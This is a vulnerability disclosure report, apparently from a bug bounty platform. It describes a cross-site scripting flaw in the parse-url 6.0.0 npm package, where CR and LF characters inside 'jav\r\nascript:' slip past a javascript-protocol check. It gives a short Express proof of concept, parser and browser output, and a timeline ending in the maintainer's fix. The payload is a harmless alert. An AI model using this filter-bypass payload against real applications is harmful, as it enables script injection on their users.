Cross Site Scripting via Improper Input Validation (Based on CRLF) in ionicabizau/parse-url

Valid

Reported on

Apr 4th 2022


Description

The parse-url The 6.0.0 version of the parser does not remove \r, \n characters between protocols. This causes spoofing of the javascript protocol itself.

Proof of Concept

const parseUrl = require("parse-url"); 
const express = require('express');
const app = express();

parsed = parseUrl("jav\r\nascript://%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);

In general, the above express code forbids the javascript protocol. However, you can spoof this using the CRLF character.

output console.log(parsed);
{
  protocols: [ 'jav\r\nascript' ],
  protocol: 'jav\r\nascript',
  port: null,
  resource: '%0aalert(1)',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'jav\r\nascript://%0aalert(1)',
  query: [Object: null prototype] {}
}
output : document in browser
<a href="jav
ascript://%0aalert(1)">CLICK ME!</a>

image

Impact

Through this vulnerability, an attacker is capable to execute malicious scripts.

References

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 3 months ago
Pocas modified the report
3 months ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 3 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the ionicabizau/parse-url team. This report is now considered stale. 2 months ago
Pocas modified the report
a month ago
Pocas modified the report
a month ago
Ionică Bizău (Johnny B.) validated this vulnerability 19 days ago

This is a good catch. Thank you very much!

Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 91051c 19 days ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
to join this conversation